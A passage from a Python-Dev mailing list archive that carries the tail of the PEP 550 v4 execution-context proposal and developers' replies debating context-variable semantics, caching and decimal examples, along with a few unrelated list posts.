``sys.run_with_logical_context()`` function performs the following steps: 1. Push *lc* onto the current execution context stack. 2. Run ``func(*args, **kwargs)``. 3. Pop *lc* from the execution context stack. 4. Return or raise the ``func()`` result. By using ``new_logical_context()`` and ``run_with_logical_context()``, we can replicate the generator behaviour like this:: class Generator: def __init__(self): self.logical_context = sys.new_logical_context() def __iter__(self): return self def __next__(self): return sys.run_with_logical_context( self.logical_context, self._next_impl) def _next_impl(self): # Actual __next__ implementation. ... Let's see how this pattern can be applied to a real generator:: # create a new context variable decimal_prec = sys.new_context_var('decimal_precision') def gen_series(n, precision): decimal_prec.set(precision) for i in range(1, n): yield MyDecimal(i) / MyDecimal(3) # gen_series is equivalent to the following iterator: class Series: def __init__(self, n, precision): # Create a new empty logical context on creation, # like the generators do. self.logical_context = sys.new_logical_context() # run_with_logical_context() will pushes # self.logical_context onto the execution context stack, # runs self._next_impl, and pops self.logical_context # from the stack. return sys.run_with_logical_context( self.logical_context, self._init, n, precision) def _init(self, n, precision): self.i = 1 self.n = n decimal_prec.set(precision) def __iter__(self): return self def __next__(self): return sys.run_with_logical_context( self.logical_context, self._next_impl) def _next_impl(self): decimal_prec.set(self.precision) result = MyDecimal(self.i) / MyDecimal(3) self.i += 1 return result For regular iterators such approach to logical context management is normally not necessary, and it is recommended to set and restore context variables directly in ``__next__``:: class Series: def __next__(self): old_prec = decimal_prec.lookup() try: decimal_prec.set(self.precision) ... finally: decimal_prec.set(old_prec) Asynchronous Generators ----------------------- The execution context semantics in asynchronous generators does not differ from that of regular generators and coroutines. Implementation ============== Execution context is implemented as an immutable linked list of logical contexts, where each logical context is an immutable weak key mapping. A pointer to the currently active execution context is stored in the OS thread state:: +-----------------+ | | ec | PyThreadState +-------------+ | | | +-----------------+ | | ec_node ec_node ec_node v +------+------+ +------+------+ +------+------+ | NULL | lc |<----| prev | lc |<----| prev | lc | +------+--+---+ +------+--+---+ +------+--+---+ | | | LC v LC v LC v +-------------+ +-------------+ +-------------+ | var1: obj1 | | EMPTY | | var1: obj4 | | var2: obj2 | +-------------+ +-------------+ | var3: obj3 | +-------------+ The choice of the immutable list of immutable mappings as a fundamental data structure is motivated by the need to efficiently implement ``sys.get_execution_context()``, which is to be frequently used by asynchronous tasks and callbacks. When the EC is immutable, ``get_execution_context()`` can simply copy the current execution context *by reference*:: def get_execution_context(self): return PyThreadState_Get().ec Let's review all possible context modification scenarios: * The ``ContextVariable.set()`` method is called:: def ContextVar_set(self, val): # See a more complete set() definition # in the `Context Variables` section. tstate = PyThreadState_Get() top_ec_node = tstate.ec top_lc = top_ec_node.lc new_top_lc = top_lc.set(self, val) tstate.ec = ec_node( prev=top_ec_node.prev, lc=new_top_lc) * The ``sys.run_with_logical_context()`` is called, in which case the passed logical context object is appended to the execution context:: def run_with_logical_context(lc, func, *args, **kwargs): tstate = PyThreadState_Get() old_top_ec_node = tstate.ec new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc) try: tstate.ec = new_top_ec_node return func(*args, **kwargs) finally: tstate.ec = old_top_ec_node * The ``sys.run_with_execution_context()`` is called, in which case the current execution context is set to the passed execution context with a new empty logical context appended to it:: def run_with_execution_context(ec, func, *args, **kwargs): tstate = PyThreadState_Get() old_top_ec_node = tstate.ec new_lc = sys.new_logical_context() new_top_ec_node = ec_node(prev=ec, lc=new_lc) try: tstate.ec = new_top_ec_node return func(*args, **kwargs) finally: tstate.ec = old_top_ec_node * Either ``genobj.send()``, ``genobj.throw()``, ``genobj.close()`` are called on a ``genobj`` generator, in which case the logical context recorded in ``genobj`` is pushed onto the stack:: PyGen_New(PyGenObject *gen): gen.__logical_context__ = sys.new_logical_context() gen_send(PyGenObject *gen, ...): tstate = PyThreadState_Get() if gen.__logical_context__ is not None: old_top_ec_node = tstate.ec new_top_ec_node = ec_node( prev=old_top_ec_node, lc=gen.__logical_context__) try: tstate.ec = new_top_ec_node return _gen_send_impl(gen, ...) finally: gen.__logical_context__ = tstate.ec.lc tstate.ec = old_top_ec_node else: return _gen_send_impl(gen, ...) * Coroutines and asynchronous generators share the implementation with generators, and the above changes apply to them as well. In certain scenarios the EC may need to be squashed to limit the size of the chain. For example, consider the following corner case:: async def repeat(coro, delay): await coro() await asyncio.sleep(delay) loop.create_task(repeat(coro, delay)) async def ping(): print('ping') loop = asyncio.get_event_loop() loop.create_task(repeat(ping, 1)) loop.run_forever() In the above code, the EC chain will grow as long as ``repeat()`` is called. Each new task will call ``sys.run_in_execution_context()``, which will append a new logical context to the chain. To prevent unbounded growth, ``sys.get_execution_context()`` checks if the chain is longer than a predetermined maximum, and if it is, squashes the chain into a single LC:: def get_execution_context(): tstate = PyThreadState_Get() if tstate.ec_len > EC_LEN_MAX: squashed_lc = sys.new_logical_context() ec_node = tstate.ec while ec_node: # The LC.merge() method does not replace existing keys. squashed_lc = squashed_lc.merge(ec_node.lc) ec_node = ec_node.prev return ec_node(prev=NULL, lc=squashed_lc) else: return tstate.ec Logical Context --------------- Logical context is an immutable weak key mapping which has the following properties with respect to garbage collection: * ``ContextVar`` objects are strongly-referenced only from the application code, not from any of the Execution Context machinery or values they point to. This means that there are no reference cycles that could extend their lifespan longer than necessary, or prevent their collection by the GC. * Values put in the Execution Context are guaranteed to be kept alive while there is a ``ContextVar`` key referencing them in the thread. * If a ``ContextVar`` is garbage collected, all of its values will be removed from all contexts, allowing them to be GCed if needed. * If a thread has ended its execution, its thread state will be cleaned up along with its ``ExecutionContext``, cleaning up all values bound to all context variables in the thread. As discussed earluier, we need ``sys.get_execution_context()`` to be consistently fast regardless of the size of the execution context, so logical context is necessarily an immutable mapping. Choosing ``dict`` for the underlying implementation is suboptimal, because ``LC.set()`` will cause ``dict.copy()``, which is an O(N) operation, where *N* is the number of items in the LC. ``get_execution_context()``, when squashing the EC, is a O(M) operation, where *M* is the total number of context variable values in the EC. So, instead of ``dict``, we choose Hash Array Mapped Trie (HAMT) as the underlying implementation of logical contexts. (Scala and Clojure use HAMT to implement high performance immutable collections [5]_, [6]_.) With HAMT ``.set()`` becomes an O(log N) operation, and ``get_execution_context()`` squashing is more efficient on average due to structural sharing in HAMT. See `Appendix: HAMT Performance Analysis`_ for a more elaborate analysis of HAMT performance compared to ``dict``. Context Variables ----------------- The ``ContextVar.lookup()`` and ``ContextVar.set()`` methods are implemented as follows (in pseudo-code):: class ContextVar: def get(self): tstate = PyThreadState_Get() ec_node = tstate.ec while ec_node: if self in ec_node.lc: return ec_node.lc[self] ec_node = ec_node.prev return None def set(self, value): tstate = PyThreadState_Get() top_ec_node = tstate.ec if top_ec_node is not None: top_lc = top_ec_node.lc new_top_lc = top_lc.set(self, value) tstate.ec = ec_node( prev=top_ec_node.prev, lc=new_top_lc) else: top_lc = sys.new_logical_context() new_top_lc = top_lc.set(self, value) tstate.ec = ec_node( prev=NULL, lc=new_top_lc) For efficient access in performance-sensitive code paths, such as in ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``, making it an O(1) operation when the cache is hit. The cache key is composed from the following: * The new ``uint64_t PyThreadState->unique_id``, which is a globally unique thread state identifier. It is computed from the new ``uint64_t PyInterpreterState->ts_counter``, which is incremented whenever a new thread state is created. * The ``uint64_t ContextVar->version`` counter, which is incremented whenever the context variable value is changed in any logical context in any thread. The cache is then implemented as follows:: class ContextVar: def set(self, value): ... # implementation self.version += 1 def get(self): tstate = PyThreadState_Get() if (self.last_tstate_id == tstate.unique_id and self.last_version == self.version): return self.last_value value = self._get_uncached() self.last_value = value # borrowed ref self.last_tstate_id = tstate.unique_id self.last_version = self.version return value Note that ``last_value`` is a borrowed reference. The assumption is that if the version checks are fine, the object will be alive. This allows the values of context variables to be properly garbage collected. This generic caching approach is similar to what the current C implementation of ``decimal`` does to cache the the current decimal context, and has similar performance characteristics. Performance Considerations ========================== Tests of the reference implementation based on the prior revisions of this PEP have shown 1-2% slowdown on generator microbenchmarks and no noticeable difference in macrobenchmarks. The performance of non-generator and non-async code is not affected by this PEP. Summary of the New APIs ======================= Python ------ The following new Python APIs are introduced by this PEP: 1. The ``sys.new_context_var(name: str='...')`` function to create ``ContextVar`` objects. 2. The ``ContextVar`` object, which has: * the read-only ``.name`` attribute, * the ``.lookup()`` method which returns the value of the variable in the current execution context; * the ``.set()`` method which sets the value of the variable in the current execution context. 3. The ``sys.get_execution_context()`` function, which returns a copy of the current execution context. 4. The ``sys.new_execution_context()`` function, which returns a new empty execution context. 5. The ``sys.new_logical_context()`` function, which returns a new empty logical context. 6. The ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)`` function, which runs *func* with the provided execution context. 7. The ``sys.run_with_logical_context(lc:LogicalContext, func, *args, **kwargs)`` function, which runs *func* with the provided logical context on top of the current execution context. C API ----- 1. ``PyContextVar * PyContext_NewVar(char *desc)``: create a ``PyContextVar`` object. 2. ``PyObject * PyContext_LookupVar(PyContextVar *)``: return the value of the variable in the current execution context. 3. ``int PyContext_SetVar(PyContextVar *, PyObject *)``: set the value of the variable in the current execution context. 4. ``PyLogicalContext * PyLogicalContext_New()``: create a new empty ``PyLogicalContext``. 5. ``PyLogicalContext * PyExecutionContext_New()``: create a new empty ``PyExecutionContext``. 6. ``PyExecutionContext * PyExecutionContext_Get()``: return the current execution context. 7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the passed EC object as the current for the active thread state. 8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *, PyLogicalContext *)``: allows to implement ``sys.run_with_logical_context`` Python API. Design Considerations ===================== Should ``PyThreadState_GetDict()`` use the execution context? ------------------------------------------------------------- No. ``PyThreadState_GetDict`` is based on TLS, and changing its semantics will break backwards compatibility. PEP 521 ------- :pep:`521` proposes an alternative solution to the problem, which extends the context manager protocol with two new methods: ``__suspend__()`` and ``__resume__()``. Similarly, the asynchronous context manager protocol is also extended with ``__asuspend__()`` and ``__aresume__()``. This allows implementing context managers that manage non-local state, which behave correctly in generators and coroutines. For example, consider the following context manager, which uses execution state:: class Context: def __init__(self): self.var = new_context_var('var') def __enter__(self): self.old_x = self.var.lookup() self.var.set('something') def __exit__(self, *err): self.var.set(self.old_x) An equivalent implementation with PEP 521:: local = threading.local() class Context: def __enter__(self): self.old_x = getattr(local, 'x', None) local.x = 'something' def __suspend__(self): local.x = self.old_x def __resume__(self): local.x = 'something' def __exit__(self, *err): local.x = self.old_x The downside of this approach is the addition of significant new complexity to the context manager protocol and the interpreter implementation. This approach is also likely to negatively impact the performance of generators and coroutines. Additionally, the solution in :pep:`521` is limited to context managers, and does not provide any mechanism to propagate state in asynchronous tasks and callbacks. Can Execution Context be implemented outside of CPython? -------------------------------------------------------- No. Proper generator behaviour with respect to the execution context requires changes to the interpreter. Should we update sys.displayhook and other APIs to use EC? ---------------------------------------------------------- APIs like redirecting stdout by overwriting ``sys.stdout``, or specifying new exception display hooks by overwriting the ``sys.displayhook`` function are affecting the whole Python process **by design**. Their users assume that the effect of changing them will be visible across OS threads. Therefore we cannot just make these APIs to use the new Execution Context. That said we think it is possible to design new APIs that will be context aware, but that is outside of the scope of this PEP. Greenlets --------- Greenlet is an alternative implementation of cooperative scheduling for Python. Although greenlet package is not part of CPython, popular frameworks like gevent rely on it, and it is important that greenlet can be modified to support execution contexts. Conceptually, the behaviour of greenlets is very similar to that of generators, which means that similar changes around greenlet entry and exit can be done to add support for execution context. Backwards Compatibility ======================= This proposal preserves 100% backwards compatibility. Appendix: HAMT Performance Analysis =================================== .. figure:: pep-0550-hamt_vs_dict-v2.png :align: center :width: 100% Figure 1. Benchmark code can be found here: [9]_. The above chart demonstrates that: * HAMT displays near O(1) performance for all benchmarked dictionary sizes. * ``dict.copy()`` becomes very slow around 100 items. .. figure:: pep-0550-lookup_hamt.png :align: center :width: 100% Figure 2. Benchmark code can be found here: [10]_. Figure 2 compares the lookup costs of ``dict`` versus a HAMT-based immutable mapping. HAMT lookup time is 30-40% slower than Python dict lookups on average, which is a very good result, considering that the latter is very well optimized. Thre is research [8]_ showing that there are further possible improvements to the performance of HAMT. The reference implementation of HAMT for CPython can be found here: [7]_. Acknowledgments =============== Thanks to Victor Petrovykh for countless discussions around the topic and PEP proofreading and edits. Thanks to Nathaniel Smith for proposing the ``ContextVar`` design [17]_ [18]_, for pushing the PEP towards a more complete design, and coming up with the idea of having a stack of contexts in the thread state. Thanks to Nick Coghlan for numerous suggestions and ideas on the mailing list, and for coming up with a case that cause the complete rewrite of the initial PEP version [19]_. Version History =============== 1. Initial revision, posted on 11-Aug-2017 [20]_. 2. V2 posted on 15-Aug-2017 [21]_. The fundamental limitation that caused a complete redesign of the first version was that it was not possible to implement an iterator that would interact with the EC in the same way as generators (see [19]_.) Version 2 was a complete rewrite, introducing new terminology (Local Context, Execution Context, Context Item) and new APIs. 3. V3 posted on 18-Aug-2017 [22]_. Updates: * Local Context was renamed to Logical Context. The term "local" was ambiguous and conflicted with local name scopes. * Context Item was renamed to Context Key, see the thread with Nick Coghlan, Stefan Krah, and Yury Selivanov [23]_ for details. * Context Item get cache design was adjusted, per Nathaniel Smith's idea in [25]_. * Coroutines are created without a Logical Context; ceval loop no longer needs to special case the ``await`` expression (proposed by Nick Coghlan in [24]_.) 4. V4 posted on 25-Aug-2017: the current version. * The specification section has been completely rewritten. * Context Key renamed to Context Var. * Removed the distinction between generators and coroutines with respect to logical context isolation. References ========== .. [1] https://blog.golang.org/context .. [2] https://msdn.microsoft.com/en-us/library/system.threading. executioncontext.aspx .. [3] https://github.com/numpy/numpy/issues/9444 .. [4] http://bugs.python.org/issue31179 .. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie .. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures- persistenthashmap-part-ii.html .. [7] https://github.com/1st1/cpython/tree/hamt .. [8] https://michael.steindorfer.name/publications/oopsla15.pdf .. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd .. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e .. [11] https://github.com/1st1/cpython/tree/pep550 .. [12] https://www.python.org/dev/peps/pep-0492/#async-await .. [13] https://github.com/MagicStack/uvloop/blob/master/examples/ bench/echoserver.py .. [14] https://github.com/MagicStack/pgbench .. [15] https://github.com/python/performance .. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c .. [17] https://mail.python.org/pipermail/python-ideas/2017- August/046752.html .. [18] https://mail.python.org/pipermail/python-ideas/2017- August/046772.html .. [19] https://mail.python.org/pipermail/python-ideas/2017- August/046775.html .. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b 3ad73a1d01/pep-0550.rst .. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e 9e5960c175/pep-0550.rst .. [22] https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71 c1248f67e7/pep-0550.rst .. [23] https://mail.python.org/pipermail/python-ideas/2017- August/046801.html .. [24] https://mail.python.org/pipermail/python-ideas/2017- August/046790.html .. [25] https://mail.python.org/pipermail/python-ideas/2017- August/046786.html Copyright ========= This document has been placed in the public domain. _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/ mertz%40gnosis.cx -------------- next part -------------- An HTML attachment was scrubbed... URL: From njs at pobox.com Sat Aug 26 02:34:29 2017 From: njs at pobox.com (Nathaniel Smith) Date: Fri, 25 Aug 2017 23:34:29 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote: > Coroutines and Asynchronous Tasks > --------------------------------- > > In coroutines, like in generators, context variable changes are local > and are not visible to the caller:: > > import asyncio > > var = new_context_var() > > async def sub(): > assert var.lookup() == 'main' > var.set('sub') > assert var.lookup() == 'sub' > > async def main(): > var.set('main') > await sub() > assert var.lookup() == 'main' > > loop = asyncio.get_event_loop() > loop.run_until_complete(main()) I think this change is a bad idea. I think that generally, an async call like 'await async_sub()' should have the equivalent semantics to a synchronous call like 'sync_sub()', except for the part where the former is able to contain yields. Giving every coroutine an LC breaks that equivalence. It also makes it so in async code, you can't necessarily refactor by moving code in and out of subroutines. Like, if we inline 'sub' into 'main', that shouldn't change the semantics, but... async def main(): var.set('main') # inlined copy of sub() assert var.lookup() == 'main' var.set('sub') assert var.lookup() == 'sub' # end of inlined copy assert var.lookup() == 'main' # fails It also adds non-trivial overhead, because now lookup() is O(depth of async callstack), instead of O(depth of (async) generator nesting), which is generally much smaller. I think I see the motivation: you want to make await sub() and await ensure_future(sub()) have the same semantics, right? And the latter has to create a Task and split it off into a new execution context, so you want the former to do so as well? But to me this is like saying that we want sync_sub() and thread_pool_executor.submit(sync_sub).result() to have the same semantics: they mostly do, but sync_sub() access thread-locals then they won't. Oh well. That's perhaps a but unfortunate, but it doesn't mean we should give every synchronous frame its own thread-locals. (And fwiw I'm still not convinced we should give up on 'yield from' as a mechanism for refactoring generators.) > To establish the full semantics of execution context in couroutines, > we must also consider *tasks*. A task is the abstraction used by > *asyncio*, and other similar libraries, to manage the concurrent > execution of coroutines. In the example above, a task is created > implicitly by the ``run_until_complete()`` function. > ``asyncio.wait_for()`` is another example of implicit task creation:: > > async def sub(): > await asyncio.sleep(1) > assert var.lookup() == 'main' > > async def main(): > var.set('main') > > # waiting for sub() directly > await sub() > > # waiting for sub() with a timeout > await asyncio.wait_for(sub(), timeout=2) > > var.set('main changed') > > Intuitively, we expect the assertion in ``sub()`` to hold true in both > invocations, even though the ``wait_for()`` implementation actually > spawns a task, which runs ``sub()`` concurrently with ``main()``. I found this example confusing -- you talk about sub() and main() running concurrently, but ``wait_for`` blocks main() until sub() has finished running, right? Is this just supposed to show that there should be some sort of inheritance across tasks, and then the next example is to show that it has to be a copy rather than sharing the actual object? (This is just a issue of phrasing/readability.) > The ``sys.run_with_logical_context()`` function performs the following > steps: > > 1. Push *lc* onto the current execution context stack. > 2. Run ``func(*args, **kwargs)``. > 3. Pop *lc* from the execution context stack. > 4. Return or raise the ``func()`` result. It occurs to me that both this and the way generator/coroutines expose their logic context means that logical context objects are semantically mutable. This could create weird effects if someone attaches the same LC to two different generators, or tries to use it simultaneously in two different threads, etc. We should have a little interlock like generator's ag_running, where an LC keeps track of whether it's currently in use and if you try to push the same LC onto two ECs simultaneously then it errors out. > For efficient access in performance-sensitive code paths, such as in > ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``, > making it an O(1) operation when the cache is hit. The cache key is > composed from the following: > > * The new ``uint64_t PyThreadState->unique_id``, which is a globally > unique thread state identifier. It is computed from the new > ``uint64_t PyInterpreterState->ts_counter``, which is incremented > whenever a new thread state is created. > > * The ``uint64_t ContextVar->version`` counter, which is incremented > whenever the context variable value is changed in any logical context > in any thread. I'm pretty sure you need to also invalidate on context push/pop. Consider: def gen(): var.set("gen") var.lookup() # cache now holds "gen" yield print(var.lookup()) def main(): var.set("main") g = gen() next(g) # This should print "main", but it's the same thread and the last call to set() was # the one inside gen(), so we get the cached "gen" instead print(var.lookup()) var.set("no really main") var.lookup() # cache now holds "no really main" next(g) # should print "gen" but instead prints "no really main" > The cache is then implemented as follows:: > > class ContextVar: > > def set(self, value): > ... # implementation > self.version += 1 > > > def get(self): I think you missed a s/get/lookup/ here :-) -n -- Nathaniel J. Smith -- https://vorpus.org From stefan_ml at behnel.de Sat Aug 26 06:22:10 2017 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 26 Aug 2017 12:22:10 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Hi, I'm aware that the current implementation is not final, but I already adapted the coroutine changes for Cython to allow for some initial integration testing with real external (i.e. non-Python coroutine) targets. I haven't adapted the tests yet, so the changes are currently unused and mostly untested. https://github.com/scoder/cython/tree/pep550_exec_context I also left some comments in the github commits along the way. Stefan From srkunze at mail.de Sat Aug 26 09:33:23 2017 From: srkunze at mail.de (Sven R. Kunze) Date: Sat, 26 Aug 2017 15:33:23 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A0DAB4.2030807@stoneleaf.us> References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> On 26.08.2017 04:19, Ethan Furman wrote: > On 08/25/2017 03:32 PM, Yury Selivanov wrote: > >> A *context variable* is an object representing a value in the >> execution context. A new context variable is created by calling >> the ``new_context_var()`` function. A context variable object has >> two methods: >> >> * ``lookup()``: returns the value of the variable in the current >> execution context; >> >> * ``set()``: sets the value of the variable in the current >> execution context. > > Why "lookup" and not "get" ? Many APIs use "get" and it's > functionality is well understood. > Why not the same interface as thread-local storage? This has been the question which bothered me from the beginning of PEP550. I don't understand what inventing a new way of access buys us here. Python features regular attribute access for years. It's even simpler than method-based access. Best, Sven -------------- next part -------------- An HTML attachment was scrubbed... URL: From pav at iki.fi Sat Aug 26 02:31:00 2017 From: pav at iki.fi (Pauli Virtanen) Date: Sat, 26 Aug 2017 08:31:00 +0200 Subject: [Python-Dev] PEP 442 undocumented C API functions Message-ID: <1503729060.5586.5.camel@iki.fi> Hi, PEP 442 says "Two new C API functions are provided to ease calling of tp_finalize, especially from custom deallocators." This includes PyObject_CallFinalizerFromDealloc. However, no documentation of these functions appears to exist (https://bugs.python. org/issue31276). As far as I understand, if you have a custom tp_dealloc, you *have* to call PyObject_CallFinalizerFromDealloc in order to get your tp_finalize called. Is this correct? However, since the necessary functions are undocumented, it's unclear if they were intended to be public Python API functions. So are they actually public functions that 3rd party extensions can call? If not, how is tp_finalize supposed to be used? I'd be happy if someone can clarify the issue. -- Pauli Virtanen From elprans at gmail.com Sat Aug 26 10:58:33 2017 From: elprans at gmail.com (Elvis Pranskevichus) Date: Sat, 26 Aug 2017 10:58:33 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <2322879.hcVsH781ou@klinga.prans.org> On Saturday, August 26, 2017 2:34:29 AM EDT Nathaniel Smith wrote: > On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote: > > Coroutines and Asynchronous Tasks > > --------------------------------- > > > > In coroutines, like in generators, context variable changes are > > local> > > and are not visible to the caller:: > > import asyncio > > > > var = new_context_var() > > > > async def sub(): > > assert var.lookup() == 'main' > > var.set('sub') > > assert var.lookup() == 'sub' > > > > async def main(): > > var.set('main') > > await sub() > > assert var.lookup() == 'main' > > > > loop = asyncio.get_event_loop() > > loop.run_until_complete(main()) > > I think this change is a bad idea. I think that generally, an async > call like 'await async_sub()' should have the equivalent semantics > to a synchronous call like 'sync_sub()', except for the part where > the former is able to contain yields. Giving every coroutine an LC > breaks that equivalence. It also makes it so in async code, you > can't necessarily refactor by moving code in and out of > subroutines. Like, if we inline 'sub' into 'main', that shouldn't > change the semantics, but... If we could easily, we'd given each _normal function_ its own logical context as well. What we are talking about here is variable scope leaking up the call stack. I think this is a bad pattern. For decimal context-like uses of the EC you should always use a context manager. For uses like Web request locals, you always have a top function that sets the context vars. > > I think I see the motivation: you want to make > > await sub() > > and > > await ensure_future(sub()) > > have the same semantics, right? And the latter has to create a Task What we want is for `await sub()` to be equivalent to `await asyncio.wait_for(sub())` and to `await asyncio.gather(sub())`. Imagine we allow context var changes to leak out of `async def`. It's easy to write code that relies on this: async def init(): var.set('foo') async def main(): await init() assert var.lookup() == 'foo' If we change `await init()` to `await asyncio.wait_for(init())`, the code will break (and in real world, possibly very subtly). > It also adds non-trivial overhead, because now lookup() is O(depth > of async callstack), instead of O(depth of (async) generator > nesting), which is generally much smaller. You would hit cache in lookup() most of the time. Elvis From shanchuan04 at gmail.com Sat Aug 26 03:53:48 2017 From: shanchuan04 at gmail.com (yang chen) Date: Sat, 26 Aug 2017 15:53:48 +0800 Subject: [Python-Dev] how to dump cst Message-ID: Hello, everyone. I'm learning python source code, I used to print info when I debug code, but it's not convenient. I want to print CST, AST, ByteCode with iPython, wirte some code, then print it's CST?AST? BYTECODE, and then to read the source code. But, I can't dump the CST tree which will transform to AST, I know I can print CST tree by modifying python source code, but how to dump the CST tree in iPython just like dumping AST with ast package. 1. get AST with ast package2. get ByteCode with dis package 3. but how get cst?? -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan at bytereef.org Sat Aug 26 07:45:58 2017 From: stefan at bytereef.org (Stefan Krah) Date: Sat, 26 Aug 2017 13:45:58 +0200 Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance (was: Re: PEP 550 v4) In-Reply-To: References: Message-ID: <20170826114558.GA2649@bytereef.org> Hi, thanks, on the whole this is *much* easier to understand. I'll add some comments on the decimal examples. The thing is, decimal is already quite tricky and people do read PEPs long after they have been accepted, so they should probably reflect best practices. On Fri, Aug 25, 2017 at 06:32:22PM -0400, Yury Selivanov wrote: > Unfortunately, TLS does not work well for programs which execute > concurrently in a single thread. A Python generator is the simplest > example of a concurrent program. Consider the following:: > > def fractions(precision, x, y): > with decimal.localcontext() as ctx: > ctx.prec = precision > yield Decimal(x) / Decimal(y) > yield Decimal(x) / Decimal(y**2) > > g1 = fractions(precision=2, x=1, y=3) > g2 = fractions(precision=6, x=2, y=3) > > items = list(zip(g1, g2)) > > The expected value of ``items`` is:: "Many people (wrongly) expect the values of ``items`` to be::" ;) > > [(Decimal('0.33'), Decimal('0.666667')), > (Decimal('0.11'), Decimal('0.222222'))] > Some languages, that support coroutines or generators, recommend > passing the context manually as an argument to every function, see [1]_ > for an example. This approach, however, has limited use for Python, > where there is a large ecosystem that was built to work with a TLS-like > context. Furthermore, libraries like ``decimal`` or ``numpy`` rely > on context implicitly in overloaded operator implementations. I'm not sure why this approach has limited use for decimal: from decimal import * def fractions(precision, x, y): ctx = Context(prec=precision) yield ctx.divide(Decimal(x), Decimal(y)) yield ctx.divide(Decimal(x), Decimal(y**2)) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) print(list(zip(g1, g2))) This is the first thing I'd do when writing async-safe code. Again, people do read PEPs. So if an asyncio programmer without any special knowledge of decimal reads the PEP, he probably assumes that localcontext() is currently the only option, while the safer and easy-to-reason-about context methods exist. > Now, let's revisit the decimal precision example from the `Rationale`_ > section, and see how the execution context can improve the situation:: > > import decimal > > decimal_prec = new_context_var() # create a new context variable > > # Pre-PEP 550 Decimal relies on TLS for its context. > # This subclass switches the decimal context storage > # to the execution context for illustration purposes. > # > class MyDecimal(decimal.Decimal): > def __init__(self, value="0"): > prec = decimal_prec.lookup() > if prec is None: > raise ValueError('could not find decimal precision') > context = decimal.Context(prec=prec) > super().__init__(value, context=context) As I understand it, the example creates a context with a custom precision and attempts to use that context to create a Decimal. This doesn't switch the actual decimal context. Secondly, the precision in the context argument to the Decimal() constructor has no effect --- the context there is only used for error handling. Lastly, if the constructor *did* use the precision, one would have to be careful about double rounding when using MyDecimal(). I get that this is supposed to be for illustration only, but please let's be careful about what people might take away from that code. > This generic caching approach is similar to what the current C > implementation of ``decimal`` does to cache the the current decimal > context, and has similar performance characteristics. I think it'll work, but can we agree on hard numbers like max 2% slowdown for the non-threaded case and 4% for applications that only use threads? I'm a bit cautious because other C-extension state-managing PEPs didn't come close to these figures. Stefan Krah From yselivanov.ml at gmail.com Sat Aug 26 12:21:44 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 12:21:44 -0400 Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance (was: Re: PEP 550 v4) In-Reply-To: <20170826114558.GA2649@bytereef.org> References: <20170826114558.GA2649@bytereef.org> Message-ID: On Sat, Aug 26, 2017 at 7:45 AM, Stefan Krah wrote: > > Hi, > > thanks, on the whole this is *much* easier to understand. Thanks! > I'll add some comments on the decimal examples. The thing is, decimal > is already quite tricky and people do read PEPs long after they have > been accepted, so they should probably reflect best practices. Agree. [..] >> Some languages, that support coroutines or generators, recommend >> passing the context manually as an argument to every function, see [1]_ >> for an example. This approach, however, has limited use for Python, >> where there is a large ecosystem that was built to work with a TLS-like >> context. Furthermore, libraries like ``decimal`` or ``numpy`` rely >> on context implicitly in overloaded operator implementations. > > I'm not sure why this approach has limited use for decimal: > > > from decimal import * > > def fractions(precision, x, y): > ctx = Context(prec=precision) > yield ctx.divide(Decimal(x), Decimal(y)) > yield ctx.divide(Decimal(x), Decimal(y**2)) > > g1 = fractions(precision=2, x=1, y=3) > g2 = fractions(precision=6, x=2, y=3) > print(list(zip(g1, g2))) Because you have to know the limitations of implicit decimal context to make this choice. Most people don't (at least from my experience). > This is the first thing I'd do when writing async-safe code. Because you know the decimal module very well :) > > Again, people do read PEPs. So if an asyncio programmer without any > special knowledge of decimal reads the PEP, he probably assumes that > localcontext() is currently the only option, while the safer and > easy-to-reason-about context methods exist. I agree. > > >> Now, let's revisit the decimal precision example from the `Rationale`_ >> section, and see how the execution context can improve the situation:: >> >> import decimal >> >> decimal_prec = new_context_var() # create a new context variable >> >> # Pre-PEP 550 Decimal relies on TLS for its context. >> # This subclass switches the decimal context storage >> # to the execution context for illustration purposes. >> # >> class MyDecimal(decimal.Decimal): >> def __init__(self, value="0"): >> prec = decimal_prec.lookup() >> if prec is None: >> raise ValueError('could not find decimal precision') >> context = decimal.Context(prec=prec) >> super().__init__(value, context=context) > > As I understand it, the example creates a context with a custom precision > and attempts to use that context to create a Decimal. > > This doesn't switch the actual decimal context. Secondly, the precision in > the context argument to the Decimal() constructor has no effect --- the > context there is only used for error handling. > > Lastly, if the constructor *did* use the precision, one would have to be > careful about double rounding when using MyDecimal(). > > > I get that this is supposed to be for illustration only, but please let's > be careful about what people might take away from that code. In the next iteration of the PEP we'll remove decimal examples and replace them with something with simpler semantics. This is clearly the best choice now. >> This generic caching approach is similar to what the current C >> implementation of ``decimal`` does to cache the the current decimal >> 